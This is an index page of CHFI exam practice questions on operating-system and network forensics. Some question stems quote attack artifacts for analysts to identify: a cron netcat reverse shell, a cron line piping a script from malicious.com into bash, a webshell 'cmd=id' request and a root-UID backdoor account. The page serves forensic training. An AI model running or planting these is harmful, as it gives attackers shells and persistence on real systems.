Courseiva

CHFI · domain

OS and Network Forensics

This domain covers collecting and interpreting evidence from operating systems and network traffic: Windows registry persistence, USB artifacts, Linux authentication logs, and TCP handshake analysis in Wireshark. Questions present a scenario or artifact and ask you to identify its purpose, source, or meaning, so you must recognize real forensic indicators rather than recall theory.

167 questions46 easy76 medium45 hard

Focused practice

Practice OS and Network Forensics questions

Scored sessions drawing only from this domain — pick a length below.

Start 20-question practice test →

What this domain covers

What to know about OS and Network Forensics

Be able to map an artifact or packet to its forensic meaning: identify persistence keys, USB insertion evidence, Linux auth logs, and TCP flags. The single most important skill is reading the scenario literally and matching it to the correct artifact or protocol behavior.

Windows Run key (HKCU\...\CurrentVersion\Run) as a persistence and autostart mechanism

USBSTOR registry key and setupapi.dev.log for USB device insertion history

Linux /var/log/auth.log as the primary authentication and sudo event source

TCP three-way handshake and RST interpretation in Wireshark packet captures

Watch out for

Common OS and Network Forensics exam traps

  • ▸Confusing the Run key with services or scheduled tasks; the Run key executes at user logon, not boot or on a timer.
  • ▸Choosing only one USB artifact when the question asks for TWO; USBSTOR and setupapi.dev.log are the standard pair.
  • ▸Misreading an RST after SYN/SYN-ACK as a completed connection instead of a refused or aborted one.

Question index

All OS and Network Forensics questions (167)

Click any question to see the full explanation, or start a practice session above.

1

Which TWO of the following are common persistence mechanisms used by malware on Windows systems? (Select two.)

Easy
2

Which TWO of the following are tools that can be used for timeline analysis in digital forensics?

Easy
3

During a forensic investigation of a compromised Linux server, an analyst checks /var/log/auth.log and finds multiple entries like "Failed password for root from 10.0.0.5 port 22 ssh2". Which tool is BEST suited to analyze the timeline of these events?

Medium
4

A forensic analyst is examining a Mac system for evidence of malicious activity. Which THREE artifacts are commonly analyzed in macOS forensics?

Medium
5

An incident responder finds the following entry in a Linux cron job: "*/5 * * * * root nc -e /bin/sh 10.0.0.5 4444". What is the purpose of this cron job?

Medium
6

Which Windows Event ID is generated when a service is installed on a system?

Easy
7

In network forensics, which tool is specifically designed for packet capture and analysis, allowing examiners to inspect individual packets and reconstruct network conversations?

Easy
8

During a forensic investigation, you find a prefetch file created at 03:15:22 UTC on the system. The corresponding executable's last modified timestamp is 02:30:00 UTC, and the system date/time shows a discrepancy of +5 minutes. What is the MOST accurate interpretation regarding the file execution time?

Hard
9

A forensic examiner is analyzing a compromised Linux system and finds a suspicious cron job in /var/spool/cron/crontabs/root that executes a script every hour. The script is located in /tmp/.hidden/update.sh. What is the BEST next step?

Hard
10

Which FOUR of the following are persistence mechanisms that can be used on Linux systems?

Hard
11

During a network breach investigation, an analyst examines NetFlow records and sees large data transfers from a server to an external IP address during off-hours. Which type of activity does this MOST likely indicate?

Medium
12

Which TWO of the following are Windows artifacts that can provide evidence of file execution, including timestamps and paths?

Medium
13

A security analyst investigates a Windows system and finds an event with ID 4625 in the Security log. What does this event indicate?

Easy
14

In a Windows forensic investigation, which registry key is used to examine programs that automatically start at system boot for all users?

Medium
15

A forensic examiner recovers a Windows 10 system and finds a prefetch file for powershell.exe with a last run time of 3 days ago, but the system's security logs show no interactive logons from that user. What does this discrepancy suggest?

Hard
16

Which Windows Event ID is generated when a new service is installed on a system?

Easy
17

Which tool is specifically designed for timeline analysis in digital forensics and is the command-line version of the log2timeline framework?

Easy
18

An analyst captures network traffic during an incident and wants to extract files transferred over HTTP. Which Wireshark feature is BEST suited for this task?

Easy
19

Which THREE of the following are common indicators of a web shell on a compromised web server? (Select THREE.)

Hard
20

Which Windows Event ID is generated when a new service is installed on a system, and is often used by malware to establish persistence?

Easy
21

Which Windows registry hive stores user-specific configuration and is loaded when a user logs in, containing artifacts such as recently accessed files and application settings?

Easy
22

An analyst is examining a PCAP file in Wireshark and notices a series of TCP SYN packets sent to multiple ports on a single IP address, with no subsequent SYN-ACK replies. What type of network activity does this indicate?

Hard
23

A forensics investigator finds a suspicious LNK file on a Windows system that points to a script located on a remote share. What is the PRIMARY forensic significance of this LNK file?

Medium
24

During a forensic investigation of a compromised Linux server, you find the following entry in /var/log/auth.log: 'Mar 10 03:14:15 server sshd[1234]: Accepted publickey for root from 10.0.0.5 port 54321 ssh2: RSA SHA256:AbCdEf123456'. Which artifact should you examine next to determine if unauthorized key-based access occurred?

Hard
25

During a forensic analysis of a compromised Linux system, you notice that the /proc filesystem contains a suspicious entry /proc/12345/exe pointing to /tmp/.hidden/malware. What conclusion can you draw?

Hard
26

During a Linux forensic investigation, you find the following entry in /var/log/auth.log: "Accepted publickey for root from 203.0.113.5 port 54321 ssh2: RSA SHA256:abc...". The user claims they never connect from that IP. Which forensic artifact should you examine next to confirm unauthorized access?

Medium
27

A security analyst reviews Windows Security Event Log and notices multiple Event ID 4625 entries for a single user account from various IP addresses within a short time frame. What is the MOST likely attack being attempted?

Easy
28

A forensic analyst is examining a network packet capture for signs of data exfiltration. Which THREE of the following are common indicators of data exfiltration over DNS? (Select three.)

Hard
29

Which TWO of the following are forensic artifacts found on macOS systems that can help reconstruct user activity?

Medium
30

Which THREE of the following are indicators of a webshell compromise on a web server?

Hard
31

A security team detects a suspicious process that writes to the Windows registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run. What is the MOST likely purpose of this activity?

Medium
32

During a forensic analysis of a Linux system, the investigator finds that the bash_history file is empty for the root user. However, the system has been used actively. What is the MOST likely explanation?

Hard
33

Which tool is commonly used for timeline analysis in digital forensics, allowing examiners to parse and correlate timestamps from various artifacts?

Medium
34

A forensic analyst examines a Mac system and runs "log show --predicate 'eventMessage contains "disk"' --last 1h" in Terminal. This command extracts Unified Log entries related to disk activity. Which macOS forensic artifact is the analyst MOST likely querying?

Hard
35

In network forensics, an analyst captures traffic and sees a large number of ICMP echo requests from 10.0.0.1 to 10.0.0.2 with varying payload sizes. What is the most likely scenario?

Easy
36

In a macOS forensic investigation, which log system stores high-level events such as application launches and authentication attempts in a binary format, and can be queried using the 'log' command?

Easy
37

During a Linux forensic investigation, you find a suspicious cron job in /etc/cron.d/malware that runs every 5 minutes as root. Which persistence mechanism is being used?

Medium
38

A forensic analyst is examining a Windows 10 system and finds suspicious activity. Which registry hive contains user-specific configuration data that can reveal evidence of recent file access through ShellBags, UserAssist, and MRU lists?

Medium
39

Which Windows Registry hive is primarily used to store user-specific application settings and recently accessed files?

Easy
40

A forensic analyst is investigating a Windows system for evidence of malware persistence. Which TWO registry locations are commonly used by malware to automatically execute on system startup?

Medium
41

Which TWO Windows artifacts can be used to identify recently accessed files or folders on a system? (Select the two best answers.)

Medium
42

A network forensic analyst captures packets and sees a TCP SYN packet sent to port 80, followed by a SYN-ACK, then an ACK, and then an HTTP GET request. What can be concluded?

Medium
43

A forensic analyst is using Plaso (log2timeline) to create a super timeline from a compromised Windows system. Which of the following is the PRIMARY advantage of using Plaso over manual timeline creation?

Hard
44

Which TWO of the following are common Linux log files that can be used for forensic analysis?

Easy
45

A network forensics analyst captures traffic and sees a series of TCP SYN packets sent to multiple ports on a target, with no corresponding SYN-ACK replies. What type of activity is MOST likely indicated?

Medium
46

A forensic tool outputs a timeline of file system events. The analyst needs to correlate registry modifications with file creation times. Which tool is specifically designed for super timeline creation from multiple sources?

Hard
47

A network analyst is reviewing a packet capture and sees a large number of TCP SYN packets sent to various ports on a single host from multiple source IPs. This pattern is most indicative of which type of attack?

Medium
48

Which THREE of the following are Windows Event IDs that are particularly useful for investigating account logon activities?

Medium
49

Which TWO of the following are valid artifacts for determining program execution on a Windows system? (Select TWO.)

Medium
50

A security analyst reviews Windows Event Logs and sees Event ID 4625 multiple times for a single user account from a remote IP address within a short time frame. What is the MOST likely interpretation?

Easy
51

Which Linux log file is the primary source for authentication-related events, including SSH login attempts and sudo usage?

Easy
52

During a forensic analysis of a compromised Linux server, you notice that the file /var/log/auth.log has been cleared. However, you find that the attacker's commands are still partially recoverable. Which artifact most likely contains the attacker's command history?

Medium
53

In Linux, which file contains hashed user passwords?

Easy
54

A network forensic analyst examines a pcap file in Wireshark and sees an HTTP POST request to '/shell.jsp' with a parameter 'cmd' containing 'dir'. The response contains a directory listing. Which intrusion artifact is indicated?

Hard
55

A forensic analyst is examining a Windows system and finds that the UserAssist key in the NTUSER.DAT hive contains entries with Rot13-encoded names. What is the primary purpose of the UserAssist key?

Hard
56

Which tool is specifically designed for timeline analysis of forensic artifacts across multiple systems and can process output from various forensic tools?

Easy
57

An investigator is analyzing a Windows system and wants to find evidence of USB device usage. Which TWO registry keys should be examined? (Select TWO.)

Medium
58

Which Windows artifact is primarily used to determine the execution history of applications, including the path and run count?

Easy
59

A security analyst is investigating a potential webshell on an IIS server. Which THREE artifacts are commonly associated with webshell presence?

Hard
60

An analyst detects a large amount of data being exfiltrated from a network over DNS queries. Which type of network analysis would BEST detect this activity?

Medium
61

A Linux investigator wants to see all commands run by a user from the bash shell. Which file should be examined?

Medium
62

An analyst is reviewing firewall logs and sees repeated outbound connections from an internal host to a known malicious IP on port 443. Which TWO network forensic data sources would BEST help determine if data exfiltration occurred?

Medium
63

Which Windows Registry hive contains user-specific configuration such as MRU lists and UserAssist artifacts?

Easy
64

In Windows forensics, which artifact is used to track recently executed programs on a per-user basis?

Easy
65

A forensic analyst finds a suspicious .plist file in /Library/LaunchDaemons/ on a macOS system. The file contains a key "ProgramArguments" with a path to a script in /tmp. Which persistence mechanism does this indicate?

Hard
66

A security analyst reviews firewall logs and sees repeated outbound connections from an internal server to an external IP on port 443. The server is not supposed to initiate outbound connections. Which action should the analyst take FIRST?

Medium
67

A forensic examiner needs to analyze the contents of a Windows prefetch file (.pf) to determine the last execution time of an application. Which tool would BEST accomplish this task?

Hard
68

Which THREE of the following are indicators of a webshell on a compromised web server? (Select THREE.)

Hard
69

A forensic analyst is examining a Windows system for evidence of a program that runs automatically every time the system starts. Which registry key is commonly used to achieve persistence via the 'Run' key?

Medium
70

A forensic analyst is investigating a Windows system for evidence of USB device usage. Which registry key is MOST useful for determining the first time a USB device was connected and its serial number?

Medium
71

A forensic analyst is examining a Windows system for evidence of USB device usage. Which TWO registry locations are known to store USB device history?

Medium
72

A forensic analyst needs to create a timeline of file system activity from a disk image. Which tool is specifically designed for this purpose and can parse various artifacts such as registry, prefetch, and log files?

Medium
73

In network forensics, which tool is commonly used to analyze and visualize NetFlow data to identify network traffic patterns?

Easy
74

A security analyst is reviewing firewall logs and notices repeated connection attempts from an internal IP to an external server on TCP port 4444. The internal host is a web server. What is the MOST likely explanation?

Medium
75

In Windows registry forensics, which key is examined to identify USB devices that were connected to the system?

Medium
76

A forensic analyst discovers an unusual entry in the Windows Registry under 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run'. Which persistence mechanism does this represent?

Medium
77

A security analyst reviews the following Windows Event log entry: Event ID 4648 with logon type 3, subject user 'CONTOSO\admin', target server 'FS01', target user 'CONTOSO\backupadmin'. What does this event indicate?

Hard
78

A forensic analyst is examining a Windows system and finds a prefetch file named NOTEPAD.EXE-12345678.pf. What information can be gleaned from this artifact? (Select the BEST answer.)

Hard
79

During an incident response, an analyst finds the following entry in /etc/crontab: */5 * * * * root /bin/bash -c 'curl -s http://malicious.com/script.sh | bash'. What is the MOST likely purpose of this entry?

Medium
80

An incident responder examines a Linux server and finds a suspicious cron job that runs every minute and executes a script located in /tmp. Which persistence technique does this represent?

Hard
81

In a macOS forensic investigation, which log system provides a timeline of high-level system events such as application launches and user logins?

Easy
82

A forensic investigator is examining a Linux system compromised via a web application. Which THREE artifacts should the investigator prioritize to determine the attacker's entry point and post-exploitation activities?

Medium
83

Which TWO of the following are tools commonly used for network forensics analysis? (Select two.)

Medium
84

A forensic analyst is examining browser history from a Chrome installation on a Windows system. Where is the Chrome history database typically stored?

Medium
85

A security analyst reviews Windows Security Event Log and finds multiple Event ID 4625 entries for a single user account within a few seconds. What does this pattern MOST likely indicate?

Easy
86

A Windows system has been compromised. The analyst finds a registry run key at HKCU\Software\Microsoft\Windows\CurrentVersion\Run with value name 'UpdateService' pointing to C:\Users\Public\svchost.exe. Why is this particularly suspicious?

Hard
87

A network forensic analyst is investigating a suspected data exfiltration incident. The analyst captures live traffic and wants to identify covert channels that might be used to transfer data out of the network. Which two of the following techniques are MOST likely to indicate a covert channel? (Choose two.)

Hard
88

During a forensic examination of a compromised Windows server, you find a registry key under HKLM\SYSTEM\CurrentControlSet\Services that points to a malicious DLL. Which event ID would have been generated when this service was installed?

Hard
89

A forensic examiner is analyzing a Mac system and wants to review system logs that record various activities, including application launches and kernel events. Which logging system on macOS should be examined?

Medium
90

An analyst identifies an unknown binary running on a Linux server. Which /proc filesystem entry would provide the command-line arguments used to start the process?

Medium
91

A Linux system administrator notices that the /var/log/auth.log file shows many 'Failed password for root' entries from a single IP address within a short timeframe. Which tool would BEST help the administrator block further access from that IP?

Medium
92

A forensic analyst examining a Windows machine finds a suspicious service named 'SrvMon' installed. The System event log shows Event ID 7045 at the time of compromise. What does this event indicate?

Medium
93

A security analyst reviews Windows Security Event Logs and finds multiple Event ID 4625 entries from a single source IP address targeting various usernames. Which type of attack is MOST likely occurring?

Medium
94

Which TWO of the following are typical sources of evidence for network forensics? (Select TWO.)

Easy
95

An incident responder finds a suspicious LNK file in a user's Startup folder on a Windows system. The LNK file's target is "C:\Windows\System32\rundll32.exe" with a command-line argument "javascript:" followed by encoded text. What is the most likely purpose of this shortcut?

Medium
96

A security analyst reviews Windows Security Event Log and observes Event ID 4625 repeatedly for a single user account from a remote IP address within a short timeframe. What is the MOST likely cause?

Easy
97

Which network forensic technique involves analyzing the flow of network traffic to identify patterns and anomalies, often using tools like SiLK or nfdump?

Medium
98

An analyst suspects that an attacker used a web shell to execute commands on a Windows web server. Which Windows event ID should the analyst look for to detect service installation that may have been used for persistence?

Medium
99

A Windows system's registry key 'HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR' contains a subkey with a serial number. What does this artifact indicate?

Hard
100

A forensic investigator is examining a Linux system and suspects that files were deleted to cover tracks. The investigator runs 'debugfs -R "lsdel" /dev/sda1' on an ext4 file system. The output shows several deleted inodes but does not include file names. What is the MOST likely reason for the missing file names?

Medium
101

A network analyst captures a packet with Wireshark showing a TCP SYN packet from IP 10.0.0.5 to 192.168.1.10 port 443, followed immediately by a SYN‑ACK from 192.168.1.10 to 10.0.0.5, then an RST from 10.0.0.5. What does this sequence MOST likely indicate?

Hard
102

Which TWO of the following tools are primarily used for timeline analysis in digital forensics? (Select TWO.)

Medium
103

Which THREE of the following are commonly used for persistence on a Windows system? (Choose THREE.)

Hard
104

During a forensic examination of a macOS system, you find a file at /private/var/log/system.log and also notice a directory /private/var/db/diagnostics/. What is the significance of these locations?

Hard
105

A SOC analyst is analyzing a packet capture from a network where an internal host communicated with a known malicious IP. The analyst uses Wireshark and applies a display filter to isolate all HTTP traffic. Which filter expression should he use?

Hard
106

Which Windows artifact is specifically designed to track the most recently used (MRU) files for specific applications and can be found in the NTUSER.DAT registry hive?

Medium
107

Which THREE of the following are commonly used network forensic data sources?

Medium
108

A forensic analyst is examining a Windows 10 system for evidence of USB device usage. Which registry hive and key path should she check to find a list of USB devices that have been connected to the system?

Medium
109

A forensic analyst finds a file with the .plist extension on a Mac system. What type of artifact is this?

Medium
110

Which TWO artifacts are commonly used to identify USB device insertion history on a Windows system? (Select TWO.)

Medium
111

During a network forensic investigation, the analyst examines firewall logs and notices a large number of outbound connections from an internal server to various IP addresses on port 443 at regular intervals. The connections are all initiated by a process called 'svchost.exe' running from a non-standard location (C:\Windows\Temp). What is the MOST likely explanation?

Hard
112

A forensic analyst finds multiple Prefetch files in C:\Windows\Prefetch with recent timestamps. What is the primary value of Prefetch files in an investigation?

Medium
113

A forensic examiner is analyzing a Linux system suspected of being used as a C2 server. Which THREE artifacts should the examiner prioritize to find evidence of command execution and persistence? (Select three.)

Hard
114

In Windows forensics, which artifact is a database of metadata about files and applications accessed by the user, used to populate the 'Recent Items' and 'Quick Access' lists?

Easy
115

In Windows registry forensics, which registry hive contains the SAM database storing local user account hashes?

Easy
116

Which network forensic tool is BEST suited for analyzing NetFlow data to identify top talkers and detect anomalies?

Easy
117

A forensic analyst is examining a Windows system and wants to identify recently accessed files and programs. Which TWO artifacts should the analyst prioritize? (Select TWO.)

Medium
118

During a forensic investigation of a Linux system, you need to determine which commands a user executed in their shell session. Which file would you examine to find this information?

Medium
119

A forensics examiner finds a suspicious entry in the Windows Registry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run pointing to a PowerShell command. Which persistence mechanism does this represent, and what is the MOST likely impact?

Hard
120

In Linux forensics, which file contains information about user account passwords in hashed form?

Easy
121

During a Windows forensic analysis, you find a suspicious LNK file in a user's Recent folder. Which of the following is NOT typically retrievable from an LNK file?

Medium
122

A forensic analyst reviews a Windows system for signs of malware persistence. Which TWO registry locations are commonly used to achieve persistence via auto-start programs?

Easy
123

A security analyst observes multiple Event ID 4625 logon failures for a single user account within a short time frame, followed by Event ID 4624 logon success. Which attack technique is MOST likely indicated?

Medium
124

In Linux forensics, an investigator examines /var/log/auth.log and finds repeated entries of "Failed password for root from 10.0.0.5 port 22 ssh2". Which type of attack is most likely indicated?

Easy
125

A security analyst is reviewing Windows Event Logs and notices multiple Event ID 4625 entries for a single user account within a short time frame. What does this most likely indicate?

Easy
126

During a forensic investigation, you find a file named ntuser.dat.LOG1 in a user's profile directory. What is the primary purpose of this file?

Medium
127

Which THREE of the following are indicators of a web shell on a web server? (Select three.)

Hard
128

A security analyst is investigating a potential intrusion and finds a webshell on a Linux web server. Which of the following logs would be MOST useful to determine how the webshell was uploaded?

Medium
129

A forensic analyst is investigating a Windows system and wants to identify recently executed programs. Which TWO artifacts should the analyst examine?

Medium
130

Which Wireshark filter should an analyst use to display only TCP packets that have the SYN flag set and the ACK flag not set?

Easy
131

Which tool is commonly used for timeline analysis in digital forensics, combining multiple artifacts into a super timeline?

Easy
132

An investigator finds a suspicious LNK file on a Windows desktop pointing to an executable in the Temp folder. What is the significance of LNK files in forensic analysis?

Medium
133

A network forensics analyst captures traffic from a suspected data exfiltration. In Wireshark, filtering for DNS queries containing a long subdomain with base64-encoded text suggests which technique?

Medium
134

A network analyst captures traffic and sees an HTTP request containing: GET /wp-content/uploads/evil.php?cmd=id HTTP/1.1. Which of the following is MOST likely occurring?

Medium
135

An investigator is analyzing a Windows 10 system suspected of malware persistence. Which registry key is commonly used by malware to achieve persistence by running a program at every user logon?

Medium
136

An attacker has compromised a Linux server and edited the /etc/passwd file to change a user's UID to 0. What is the likely goal of this modification?

Medium
137

A forensic examiner is analyzing a compromised Linux server and notices that /etc/cron.daily contains a script named 'sysupdate.sh' that runs a base64-encoded command. Which persistence mechanism is being used?

Hard
138

Which Windows Event ID is generated when a new service is installed on the system?

Easy
139

During a Windows forensic investigation, an analyst finds prefetch files with the .pf extension. Which TWO pieces of information can the analyst obtain from analyzing prefetch files?

Easy
140

In Linux forensics, which file contains user account information including the user ID, group ID, home directory, and default shell?

Easy
141

A forensic analyst is performing timeline analysis on a compromised system. Which tool is specifically designed to parse multiple log sources and create a super timeline?

Easy
142

A network forensic investigator is analyzing traffic from a compromised web server. Which TWO artifacts are MOST likely to indicate the presence of a web shell? (Select TWO.)

Easy
143

During a Linux forensic investigation, you find that the file /etc/cron.d/evil contains the entry: '* * * * * root /bin/bash /root/backdoor.sh'. What persistence mechanism is being used?

Hard
144

Which TWO Windows Event IDs are associated with successful and failed logon events? (Select two.)

Medium
145

Which TWO of the following are persistence mechanisms commonly found in Windows forensics? (Select two.)

Easy
146

During a forensic examination of a Windows 10 system, you find a file named "chrome_000001.jumplist" in the user's AppData directory. What does the presence of this file indicate?

Hard
147

A forensic examiner is analyzing a Windows system and wants to determine the last time a specific user logged on interactively. Which Windows Event Log artifact should the examiner review?

Easy
148

During a Linux forensic investigation, you find that the /var/log/auth.log file contains log entries showing multiple 'Failed password for root' messages from a single IP address, followed by a 'Accepted password for root' entry. What is the MOST likely conclusion?

Hard
149

A security team detects exfiltration via HTTP POST requests to a suspicious domain. Which network forensic technique would BEST identify the data being sent in these requests?

Medium
150

An analyst reviews Windows Registry for USB device usage history. Which registry hive and key contain the 'USBSTOR' key that logs unique serial numbers of connected USB drives?

Hard
151

During a Linux forensic investigation, you find that the file /var/log/auth.log has been deleted. Which of the following artefacts would BEST help determine recent SSH login attempts?

Medium
152

A forensic examiner finds a suspicious entry in the Linux file /etc/passwd: 'backdoor:x:0:0:root:/root:/bin/bash'. What is the MOST significant security issue with this entry?

Medium
153

Which THREE of the following are common indicators of a web shell presence on a compromised IIS web server? (Select THREE.)

Hard
154

Which TWO Windows Event IDs are associated with successful logon or explicit credential usage? (Choose TWO.)

Medium
155

In a Mac forensic investigation, which TWO artifacts are valuable for determining the timeline of file access? (Select two.)

Medium
156

A Windows system is suspected of having malware that maintains persistence by starting every time a user logs in. Which registry key should be examined FIRST for this persistence mechanism?

Medium
157

A security analyst is reviewing Windows Security Event Logs and notices multiple Event ID 4625 entries for a single user account within a short time frame. What does this MOST likely indicate?

Easy
158

During a Linux forensic investigation, an analyst examines the file /var/log/auth.log and finds repeated entries with 'Failed password for root from 192.168.1.200 port 22 ssh2'. Which TWO conclusions can the analyst draw from this evidence?

Medium
159

Which Linux log file is the PRIMARY source for authentication-related events such as user logins, sudo usage, and failed authentication attempts?

Easy
160

An analyst is reviewing a Linux system for signs of a rootkit. Which THREE of the following are common indicators of a rootkit infection? (Select THREE.)

Hard
161

A security team is analyzing a compromised Linux server. Indicators suggest the attacker used a web shell. Which THREE of the following are common persistence mechanisms that may be found on the system? (Select THREE.)

Hard
162

Which tool is commonly used in timeline analysis for digital forensics to parse various artifacts and create a super timeline?

Easy
163

A security analyst detects a sudden spike in failed logon events with Event ID 4625 on a Windows domain controller. The source IP addresses are random and from various external subnets. Which type of attack is MOST likely occurring?

Medium
164

A security analyst reviews Windows Security event logs and finds Event ID 4625 with Logon Type 10. What does this indicate?

Medium
165

During a Mac forensic investigation, you examine the unified log for process execution around the time of an incident. Which command-line tool is used to query the macOS unified log?

Hard
166

An analyst reviews proxy logs and sees repeated requests to a known malicious domain from multiple internal hosts, each using a different User-Agent string. The requests are all GET requests for /images/icon.png. What technique is most likely being used to evade detection?

Hard
167

In Mac forensics, which artifact stores system-wide and per-user application preferences, often used to determine configured settings and recently accessed files?

Medium

Frequently asked questions

What does the OS and Network Forensics domain cover on the CHFI exam?
Be able to map an artifact or packet to its forensic meaning: identify persistence keys, USB insertion evidence, Linux auth logs, and TCP flags. The single most important skill is reading the scenario literally and matching it to the correct artifact or protocol behavior.
How many questions are in this domain?
This page lists all 167 OS and Network Forensics questions in the CHFI question bank. The actual exam draws from this domain proportionally to its weighting in the official exam blueprint.
What is the best way to practise this domain?
Start with a short focused session (10 questions) to identify gaps, then work through explanations. Repeat with a longer session once the weak areas feel solid.
Can I practise only OS and Network Forensics questions?
Yes — the session launcher on this page filters questions to this domain only. Choose any session length for inline explanations and scoring.
ec-chfi EC-CHFI chfi os network Practice Questions